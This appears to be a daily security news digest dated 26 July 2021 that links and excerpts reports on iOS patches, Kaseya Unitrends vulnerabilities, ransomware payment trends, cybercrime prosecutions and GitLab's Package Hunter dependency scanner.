Daily NCSC-FI news followup 2021-07-26

iOS 14.7.1: Apple Issues Urgent iPhone Update With Important Security Fixes

www.forbes.com/sites/kateoflahertyuk/2021/07/26/ios-1471-apple-issues-urgent-iphone-update-with-important-security-fixes/ Its only been a week since Apple released iOS 14.7, which itself included critical security fixes, but did not address a vulnerability in iMessage that adversaries could have been taking advantage of to attack iPhones with the Pegasus spyware.

Researchers warn of unpatched Kaseya Unitrend backup vulnerabilities

www.bleepingcomputer.com/news/security/researchers-warn-of-unpatched-kaseya-unitrend-backup-vulnerabilities/ Last week, the Dutch Institute for Vulnerability Disclosure (DIVD) issued a TLP:AMBER advisory about three unpatched vulnerabilities in the Kaseya Unitrends backup product.. While DIVD released this advisory under the TLP:AMBER designation, DIVD Chairman Victor Gevers told BleepingComputer that it was originally shared with 68 government CERTs under a coordinated disclosure.. However, one of the recipients uploaded it to an online analyzing platform, where it became public to those with access to the service.

PlugwalkJoe Does the Perp Walk

krebsonsecurity.com/2021/07/plugwalkjoe-does-the-perp-walk/ [News coverage on the arrest of Joseph PlugwalkJoe OConnor] overlooks sinister criminal charges in the indictment, which involve an underground scene wherein young men turn to extortion, sextortion, SIM swapping, death threats and physical attacks all in a frenzied effort to seize control over social media accounts.. According to the indictment, a week after the Twitter hack a man identifying himself as OConnor called federal investigators in Northern California. Specifically, the call went to the REACT Task Force. REACT is a team of law enforcement officers and prosecutors based in Santa Clara, Calif. that is focused on catching criminal SIM swappers, and by this point REACT already had plenty of audio from . phone calls traced back to OConnor in which he allegedly participated in a SIM swapping or swatting attack.

No More Ransom saves almost 1 billion in ransomware payments in 5 years

www.bleepingcomputer.com/news/security/no-more-ransom-saves-almost-1-billion-in-ransomware-payments-in-5-years/ The No More Ransom project celebrates its fifth anniversary today after helping over six million ransomware victims recover their files and saving them almost 1 billion in ransomware payments.

2021 RANSOMWARE IMPACT REPORT

www.keeper.io/hubfs/2021_Ransomware_Impact_Report/2021_Ransomware_Impact_Report.pdf But what happens within an organization post-attack? How are internal processes affected? Whats the impact on employee efficiency and productivity? To find out, Keeper surveyed 2,000 employees across the U.S. whose employers had suffered a ransomware attack in the previous 12 months.. 49% of respondents told Keeper that their employers paid the ransom. However, this money didnt fall out of the sky: 93% reported that their employers tightened budgets in other areas following the ransom payment.. 26% of respondents reported that their employers disclosed the attack only to partners and customers (not the general public), while 15% didnt tell anyone. This indicates that ransomware attacks are likely far more pervasive than anyone realizes.

Disrupting Ransomware by Disrupting Bitcoin

www.schneier.com/blog/archives/2021/07/disrupting-ransomware-by-disrupting-bitcoin.html We suggest an easier alternative: merely disrupt the cryptocurrency markets. Making them harder to use will have the effect of making them less useful as a ransomware payment vehicle, and not just because victims will have more difficulty figuring out how to pay. The reason requires understanding how criminals collect their profits.

Q2 Ransom Payment Amounts Decline as Ransomware becomes a National Security Priority

www.coveware.com/blog/2021/7/23/q2-ransom-payment-amounts-decline-as-ransomware-becomes-a-national-security-priority The average ransom payment declined to $136,576 while the median fell to $47,008, levels not seen since the beginning of 2021. The decrease was primarily driven by a growing number of disparate Ransomware-as-a-Service brands that have proliferated recently, and which have diluted the concentration of attacks controlled by just a few.. [Interesting chart on the various degrees of state responsibility for cyber attacks https://images.squarespace-cdn.com/content/v1/5ab16578e2ccd10898976178/1627049256926-84KBU1XKAFQ6HWRKRW0U/State+responsibility.png]

Estonian Citizen Pleads Guilty to Computer Fraud and Abuse

www.justice.gov/usao-ak/pr/estonian-citizen-pleads-guilty-computer-fraud-and-abuse According to court documents, Pavel Tsurkan, 33, operated a criminal proxy botnet by remotely accessing and compromising more than 1,000 computer devices and internet routers worldwide, including at least 60 victims in Alaska. He used the victims devices to build and operate an Internet of Things (IoT)-based botnet dubbed the Russian2015 using the domain Russian2015.ru. . Also

therecord.media/botnet-operator-who-proxied-traffic-for-other-cybercrime-groups-pleads-guilty/

Clubhouse denies data breach, experts debunk claims of leaked phone numbers

techzimo.com/clubhouse-denies-data-breach-experts-debunk-claims-of-leaked-phone-numbers/ On July 23, a hacker group claimed that they have got access to over 3.8 billion phone numbers from Clubhouse servers. The claim posted on a hackers forum alleging the leak states that the list of numbers contains cellphone, fixed, private, and professional numbers. The information about the claim was shared on Twitter by Jiten Jain, Director, Voyager Infosec.. The social audio app has now denied the leak and after examining the claims, several security experts have also said that these are false allegations against the company.

Even after Emotet takedown, Office docs deliver 43% of all malware downloads now

www.zdnet.com/article/even-after-emotet-takedown-office-docs-deliver-43-of-all-malware-downloads-now/ Malware delivered over the cloud increased by 68% in Q2, according to data from cybersecurity firm Netskope.. Report at

go.netskope.com/rs/665-KFP-612/images/2021-07-Cloud%20and%20Threat%20Report-RR-474-1.pdf

Meet Package Hunter: A tool for detecting malicious code in your dependencies

about.gitlab.com/blog/2021/07/23/announcing-package-hunter/ Package Hunter is a tool to analyze a program’s dependencies for malicious code and other unexpected behavior by installing the dependencies in a sandbox environment and monitoring system calls executed during the installation. Any suspicious system calls are reported to the user for further examination. It currently supports testing NodeJS modules and Ruby Gems.

You might be interested in …

Daily NCSC-FI news followup 2019-08-28

Avast and French police take over malware botnet and disinfect 850,000 computers decoded.avast.io/janvojtesek/putting-an-end-to-retadup-a-malicious-worm-that-infected-hundreds-of-thousands/ Cybercrime: Ransomware attacks have more than doubled this year www.zdnet.com/article/cyber-crime-ransomware-attacks-have-more-than-doubled-this-year/ TrickBot Modifications Target U.S. Mobile Users www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users TrickBot added functionality to solicit PIN codes from mobile customers, which could allow threat actors to access victims voice and text communications. WootCloud Discovers ARES […]

Read More

Daily NCSC-FI news followup 2019-07-25

The Unsexy Threat to Election Security krebsonsecurity.com/2019/07/the-unsexy-threat-to-election-security/ Much has been written about the need to further secure our elections, from ensuring the integrity of voting machines to combating fake news. But according to a report quietly issued by a California grand jury this week, more attention needs to be paid to securing social media and […]

Read More

Daily NCSC-FI news followup 2021-01-13

Cloud Threat Hunting: Attack & Investigation Series- Lateral Movement Under the Radar blog.checkpoint.com/2021/01/13/cloud-threat-hunting-attack-investigation-series-lateral-movement-under-the-radar/ A sign of a truly sophisticated attack in the cloud is the ability to move laterally undetected. Doing so successfully requires knowledge of many techniques. In this latest installation of the Cloud Threat Hunting: Attack and Investigation Series, we present the most […]

Read More

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.